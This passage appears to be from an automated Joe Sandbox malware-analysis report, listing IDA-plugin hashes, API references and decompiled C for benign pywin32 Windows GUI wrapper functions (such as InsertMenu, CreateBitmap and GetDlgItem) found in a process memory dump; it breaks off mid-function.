                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$Arg_BufferErr_FormatParseReadTupleU_object@@
                            • String ID: Argument must be a %d-byte string/buffer (got %d bytes)$InsertMenuItem$OiiO:InsertMenuItem
                            • API String ID: 3170462299-1297077191
                            • Opcode ID: e607909529ef04b76fbf1b082450135cedf615b70ab8a182811de1299e3c1f70
                            • Instruction ID: 55d2f30418833c8184b1eb26bc7377a2cb270030e6e03099bbc47976d8b6badb
                            • Opcode Fuzzy Hash: e607909529ef04b76fbf1b082450135cedf615b70ab8a182811de1299e3c1f70
                            • Instruction Fuzzy Hash: 62218E75408201AFCB019F55CC84B6B7BF8FF84301F488A69F845C1131E7319A6B9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiiO:InsertMenu,?,?,?,?,?), ref: 6DAB354D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB3569
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DAB3583
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB3592
                            • InsertMenuW.USER32(?,?,?,?,?), ref: 6DAB35AE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB35B7
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAB35C8
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(InsertMenu,00000000), ref: 6DAB35D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$Arg_Error@@FreeInsertMenuParseRestoreSaveTupleWin_
                            • String ID: InsertMenu$OiiiO:InsertMenu
                            • API String ID: 3412221406-3830871062
                            • Opcode ID: 1179cc9b427473c1a781553c99b5b2cd86fc73924ea117e3fa357b2fd9fc17b9
                            • Instruction ID: 43da9e257f78ecea9eeb762cd728066803a1dec6a14084059611700fe17315a8
                            • Opcode Fuzzy Hash: 1179cc9b427473c1a781553c99b5b2cd86fc73924ea117e3fa357b2fd9fc17b9
                            • Instruction Fuzzy Hash: 17215175408301AFDB019F14CC45B6B7BB8FF84355F448A29F989D1131E731D66A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:AppendMenu,?,?,?,?), ref: 6DAB3458
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB3474
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000000,00000000,00000000), ref: 6DAB348E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB349D
                            • AppendMenuW.USER32 ref: 6DAB34B5
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB34BE
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAB34CF
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(AppendMenu,00000000), ref: 6DAB34DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$AppendArg_Error@@FreeMenuParseRestoreSaveTupleWin_
                            • String ID: AppendMenu$OiiO:AppendMenu
                            • API String ID: 3528935396-2351365262
                            • Opcode ID: 588f23f5c030743b65cba3744a6042371f4a660459172ad532badb57faeba767
                            • Instruction ID: 1666a74ec278eaec1243563c4fc31202f9ec135bac25c39b147e6f959c61a1aa
                            • Opcode Fuzzy Hash: 588f23f5c030743b65cba3744a6042371f4a660459172ad532badb57faeba767
                            • Instruction Fuzzy Hash: 6B217C75408302AFDB01AF19CC49B6B7BB8FF84351F448969F989D1131E731D9AB8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO|O:ListView_SortItemsEx,?,?,?), ref: 6DAAB914
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB92E
                            • PyCallable_Check.PYTHON38 ref: 6DAAB942
                            • PyErr_Format.PYTHON38(6E28ED8C,2nd param must be callable (got type %s),?), ref: 6DAAB964
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAB97F
                            • SendMessageW.USER32(?,00001051,?,Function_0000B720), ref: 6DAAB99A
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAB9A3
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ListView_SortItemsEx,00000000), ref: 6DAAB9B9
                            Strings
                            • 2nd param must be callable (got type %s), xrefs: 6DAAB95D
                            • ListView_SortItemsEx, xrefs: 6DAAB9B4
                            • OO|O:ListView_SortItemsEx, xrefs: 6DAAB90B
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Callable_CheckErr_Error@@FormatMessageObject_ParseRestoreSaveSendTupleWin_
                            • String ID: 2nd param must be callable (got type %s)$ListView_SortItemsEx$OO|O:ListView_SortItemsEx
                            • API String ID: 1280373063-2720867896
                            • Opcode ID: 5109bfa642738e3eea9c9a537127ef5cc9691d8e2fcf495e2d722d56baa34b1e
                            • Instruction ID: f9ece80c820d9ee4e937a5a5001c94bc2b3fec3e30c908afef81a802e6957a96
                            • Opcode Fuzzy Hash: 5109bfa642738e3eea9c9a537127ef5cc9691d8e2fcf495e2d722d56baa34b1e
                            • Instruction Fuzzy Hash: 8C213A75908205AFDB01AF68CC84A6A77F9FF45301F488669F945C3232E731D9668B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:WaitForSingleObjectEx,00000000,?), ref: 6DA923CA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA923E6
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA923F8
                            • PyErr_Occurred.PYTHON38 ref: 6DA92408
                            Strings
                            • OOi:WaitForSingleObjectEx, xrefs: 6DA923C1
                            • WaitForSingleObjectEx, xrefs: 6DA92445
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OOi:WaitForSingleObjectEx$WaitForSingleObjectEx
                            • API String ID: 1011514818-2631600235
                            • Opcode ID: 1d03a2becfa368ea9c146b0ede356c856d34868693f14648d2f362eed521d278
                            • Instruction ID: f7b150c9d1219dc7a629c8a2fb07c0931b2cad11ca2e14530c95851561497ab4
                            • Opcode Fuzzy Hash: 1d03a2becfa368ea9c146b0ede356c856d34868693f14648d2f362eed521d278
                            • Instruction Fuzzy Hash: 5B110A3512C2016BDB101B28DC08BAF3BF8FFC9325F948434F874C9191EB75C1A68A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:SetWindowText,?,?), ref: 6DAAE12E
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE14A
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000000,00000000,00000000), ref: 6DAAE164
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE173
                            • SetWindowTextW.USER32(?,?), ref: 6DAAE183
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE18C
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAAE19D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowText,00000000), ref: 6DAAE1A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$Arg_Error@@FreeParseRestoreSaveTextTupleWin_Window
                            • String ID: OO:SetWindowText$SetWindowText
                            • API String ID: 3577397743-795343297
                            • Opcode ID: 1bd9d3d7cdab051175109036562d01d6b34c51d1371ecfdc04260fbaffff9f6d
                            • Instruction ID: 3e8667909800d64297f112f3533a1be55a44040b41db0e8784d67e981fd43564
                            • Opcode Fuzzy Hash: 1bd9d3d7cdab051175109036562d01d6b34c51d1371ecfdc04260fbaffff9f6d
                            • Instruction Fuzzy Hash: CF119375508311AFEB009F24CC49B6B7BF8FF85355F488925F859C1171E7318966CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E6DAB1170(intOrPtr _a8) {
                            				int _v4;
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				int* _t14;
                            				void* _t16;
                            				struct HBITMAP__* _t17;
                            				long _t19;
                            				void* _t21;
                            				void* _t22;
                            				void* _t26;
                            				void** _t30;
                            				void** _t31;
                            				void* _t37;
                            
                            				 *_t30 = 0;
                            				_t14 =  &_v4;
                            				__imp__PyArg_ParseTuple(_a8, "iiiiO:CreateBitmap", _t14,  &_v8,  &_v12,  &_v16, _t30);
                            				_t31 =  &(_t30[7]);
                            				if(_t14 == 0) {
                            					L3:
                            					return 0;
                            				} else {
                            					_t16 =  *_t31;
                            					_t37 = _t16 - __imp___Py_NoneStruct; // 0x6e294ce8
                            					if(_t37 == 0) {
                            						__imp__PyEval_SaveThread(_t22, _t26);
                            						SetLastError(0);
                            						_t17 = CreateBitmap(_v4, _v8, _v12, _v16, 0);
                            						_t23 = _t17;
                            						__imp__PyEval_RestoreThread(_t16);
                            						if(_t17 != 0) {
                            							L7:
                            							return E6DAA5630(_t21, _t23);
                            						} else {
                            							_t19 = GetLastError();
                            							if(_t19 == 0) {
                            								goto L7;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateBitmap", _t19);
                            								return _t19;
                            							}
                            						}
                            					} else {
                            						__imp__PyErr_SetString( *__imp__PyExc_TypeError, "This param must be None");
                            						goto L3;
                            					}
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,iiiiO:CreateBitmap,?,?,?,?), ref: 6DAB119B
                            • PyErr_SetString.PYTHON38(6E28ED8C,This param must be None), ref: 6DAB11BF
                              • Part of subcall function 6DAA5630: new.LIBCMT ref: 6DAA564C
                              • Part of subcall function 6DAA5630: ??0PyHANDLE@@QAE@PAX@Z.PYWINTYPES38(?), ref: 6DAA5669
                              • Part of subcall function 6DAA5630: DeleteObject.GDI32(?), ref: 6DAA5687
                              • Part of subcall function 6DAA5630: PyErr_NoMemory.PYTHON38 ref: 6DAA568D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB11D0
                            • SetLastError.KERNEL32(00000000), ref: 6DAB11DA
                            • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6DAB11F2
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB11FB
                            • GetLastError.KERNEL32 ref: 6DAB1208
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateBitmap,00000000), ref: 6DAB1218
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_ErrorEval_LastThread$Arg_BitmapCreateDeleteError@@MemoryObjectParseRestoreSaveStringTupleU_object@@Win_
                            • String ID: CreateBitmap$This param must be None$iiiiO:CreateBitmap
                            • API String ID: 4003298522-1973228922
                            • Opcode ID: ebc7ef254c420fbcfa0aaf7446c7f3ea1c5f93fdb68982e85f75efd4b8f1d9ec
                            • Instruction ID: 73d82dc5acbffed5fe289cce143a911dcae8943518c7f22ab2cb28d53fe51fc9
                            • Opcode Fuzzy Hash: ebc7ef254c420fbcfa0aaf7446c7f3ea1c5f93fdb68982e85f75efd4b8f1d9ec
                            • Instruction Fuzzy Hash: 0B11907240C201AFCB01AF54DC89BBB7BBDBF45201F484A29F585C1121E735D55B8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:WaitForSingleObject,?), ref: 6DA922F5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA92311
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA92323
                            • PyErr_Occurred.PYTHON38 ref: 6DA92333
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OO:WaitForSingleObject$WaitForSingleObject
                            • API String ID: 1011514818-2443890474
                            • Opcode ID: 6e3af3e7593d98acd157b1d3b89bafc66f6db733c477e61ac8d8e59db1fb22c1
                            • Instruction ID: ff771f9c539e3beff1fd65d5607289c6fc3908ff631f19b685d6c694c37f8566
                            • Opcode Fuzzy Hash: 6e3af3e7593d98acd157b1d3b89bafc66f6db733c477e61ac8d8e59db1fb22c1
                            • Instruction Fuzzy Hash: 24112B3552C2016BDB105B68EC09BAF3BF8BF89325F948134FC64C9190FB798599C65B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:WaitForInputIdle,?), ref: 6DA92495
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA924B1
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA924C3
                            • PyErr_Occurred.PYTHON38 ref: 6DA924D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OO:WaitForInputIdle$WaitForInputIdle
                            • API String ID: 1011514818-4093374188
                            • Opcode ID: 6bcd4bf30a05a378a74f3f3084ce39e40e0384dfa71a63075491a06266bf0c72
                            • Instruction ID: 8fa216d9cb431ada0d22671c24c53e37d569f978867117efd9f574ed0f815498
                            • Opcode Fuzzy Hash: 6bcd4bf30a05a378a74f3f3084ce39e40e0384dfa71a63075491a06266bf0c72
                            • Instruction Fuzzy Hash: 64112B7552C2016BDB104B28EC09BAE3BF8BFCA325F948035FC64C5190FB74859AC69B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAAF4D0(intOrPtr _a8) {
                            				void* _v4;
                            				int _v8;
                            				int _v12;
                            				long _v16;
                            				long* _t12;
                            				void** _t13;
                            				long _t15;
                            				void* _t16;
                            				long _t17;
                            				void* _t20;
                            
                            				_v16 = 0;
                            				_t12 =  &_v16;
                            				__imp__PyArg_ParseTuple(_a8, "Oii:ImageList_GetIcon", _t12,  &_v8,  &_v12);
                            				if(_t12 != 0) {
                            					_t13 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t13);
                            					if(_t13 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t16, _t20);
                            						SetLastError(0);
                            						_t15 = ImageList_GetIcon(_v4, _v8, _v12);
                            						_t17 = _t15;
                            						__imp__PyEval_RestoreThread(_t13);
                            						if(_t17 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t17);
                            							return _t15;
                            						} else {
                            							_t15 = GetLastError();
                            							if(_t15 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("ImageList_GetIcon", _t15);
                            								return _t15;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}














                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:ImageList_GetIcon,?,?,?), ref: 6DAAF4F2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF50E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF51D
                            • SetLastError.KERNEL32(00000000), ref: 6DAAF527
                            • ImageList_GetIcon.COMCTL32(?,?,?), ref: 6DAAF539
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF542
                            • GetLastError.KERNEL32 ref: 6DAAF54F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ImageList_GetIcon,00000000), ref: 6DAAF55F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@IconImageList_Object_ParseRestoreSaveTupleWin_
                            • String ID: ImageList_GetIcon$Oii:ImageList_GetIcon
                            • API String ID: 2386716884-2218718920
                            • Opcode ID: 53a9d25af77acca4092fa149ea96ef91811f0958360688b930d7763d16f8014d
                            • Instruction ID: 0a673d63193ff9503978285799ac78425886cdfae79c18117b10488e46e162d7
                            • Opcode Fuzzy Hash: 53a9d25af77acca4092fa149ea96ef91811f0958360688b930d7763d16f8014d
                            • Instruction Fuzzy Hash: B711737A40C302AFDB006F68CC49BAB7BB8EF85211F488629F959C1121E735C5569B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowPlacement), ref: 6DAA8510
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA852C
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8543
                            • GetWindowPlacement.USER32(0000002C,0000002C), ref: 6DAA8554
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA855D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetWindowPlacement,00000000), ref: 6DAA8573
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParsePlacementRestoreSaveTupleWin_Window
                            • String ID: (ii(ii)(ii)(iiii))$,$GetWindowPlacement$O:GetWindowPlacement
                            • API String ID: 2077839949-131567012
                            • Opcode ID: 6c90e91fb808c2b7da22b83fdc5b4d3fbf74cc13ababe98dfdceb1ec8026ccaf
                            • Instruction ID: 746d34c99b99e353d64ccad38da1b623216a1e1519c1ef8a56816caa162c03c3
                            • Opcode Fuzzy Hash: 6c90e91fb808c2b7da22b83fdc5b4d3fbf74cc13ababe98dfdceb1ec8026ccaf
                            • Instruction Fuzzy Hash: 0A01B1B1808341AFDB006B65CC49B6B7BB8BF81201F484A28FC55C1231E731CA2A8A97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,GetLayeredWindowAttributes), ref: 6DAACD1D
                            • PyArg_ParseTupleAndKeywords.PYTHON38(?,?,O:GetLayeredWindowAttributes,6DAC7ADC,?), ref: 6DAACD41
                            Strings
                            • %s is not available on this platform, xrefs: 6DAACD16
                            • GetLayeredWindowAttributes, xrefs: 6DAACD11
                            • O:GetLayeredWindowAttributes, xrefs: 6DAACD34
                            • kbk, xrefs: 6DAACDA8
                            • GetLayeredWindowAttributes, xrefs: 6DAACD88
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatKeywordsParseTuple
                            • String ID: %s is not available on this platform$GetLayeredWindowAttributes$GetLayeredWindowAttributes$O:GetLayeredWindowAttributes$kbk
                            • API String ID: 223827023-3646884599
                            • Opcode ID: 65ee89149d1d00b70a3219fe986427c6ac3713de6ce60463023ab664fd2d2551
                            • Instruction ID: 55ba5fd4fa6c8938c7ea21a2c00a729a0870148e9499086084042c87097ed6d6
                            • Opcode Fuzzy Hash: 65ee89149d1d00b70a3219fe986427c6ac3713de6ce60463023ab664fd2d2551
                            • Instruction Fuzzy Hash: CA1146BA40C201BFDB005F59CC459677BB8FF40205F488668F95981032F736D6669B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAADCA0(intOrPtr _a8) {
                            				struct HWND__* _v4;
                            				int _v8;
                            				long _v12;
                            				long* _t9;
                            				struct HWND__** _t10;
                            				long _t12;
                            				void* _t13;
                            				long _t14;
                            				void* _t17;
                            
                            				_v12 = 0;
                            				_t9 =  &_v12;
                            				__imp__PyArg_ParseTuple(_a8, "Oi:GetDlgItem", _t9,  &_v8);
                            				if(_t9 != 0) {
                            					_t10 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v12, _t10);
                            					if(_t10 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t13, _t17);
                            						SetLastError(0);
                            						_t12 = GetDlgItem(_v4, _v8);
                            						_t14 = _t12;
                            						__imp__PyEval_RestoreThread(_t10);
                            						if(_t14 != 0) {
                            							L6:
                            							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t14);
                            							return _t12;
                            						} else {
                            							_t12 = GetLastError();
                            							if(_t12 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetDlgItem", _t12);
                            								return _t12;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}













                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:GetDlgItem,?,?), ref: 6DAADCBD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAADCD9
                            • PyEval_SaveThread.PYTHON38 ref: 6DAADCE8
                            • SetLastError.KERNEL32(00000000), ref: 6DAADCF2
                            • GetDlgItem.USER32 ref: 6DAADD00
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAADD09
                            • GetLastError.KERNEL32 ref: 6DAADD16
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetDlgItem,00000000), ref: 6DAADD26
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@ItemObject_ParseRestoreSaveTupleWin_
                            • String ID: GetDlgItem$Oi:GetDlgItem
                            • API String ID: 2906612425-93230050
                            • Opcode ID: 5670693d42d80830013716f1d2699f05c428b6a4677f3ea2852490bc8016faa0
                            • Instruction ID: 75b9a7f0dfdd08be4fbdc67f818653bc2f8bad2f3d78a21c84943d34e2fdf04a
                            • Opcode Fuzzy Hash: 5670693d42d80830013716f1d2699f05c428b6a4677f3ea2852490bc8016faa0
                            • Instruction Fuzzy Hash: 560182755082016FDF006F649D4976B3BB8FF81612F488A29FD89C1121F735856ADAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB80D0(intOrPtr _a8) {
                            				struct tagPOINT _v8;
                            				long _v12;
                            				long* _t6;
                            				struct tagPOINT* _t7;
                            				long _t9;
                            				void* _t10;
                            				long _t11;
                            				void* _t14;
                            
                            				_t6 =  &_v12;
                            				_v12 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "O:WindowFromPoint", _t6);
                            				if(_t6 != 0) {
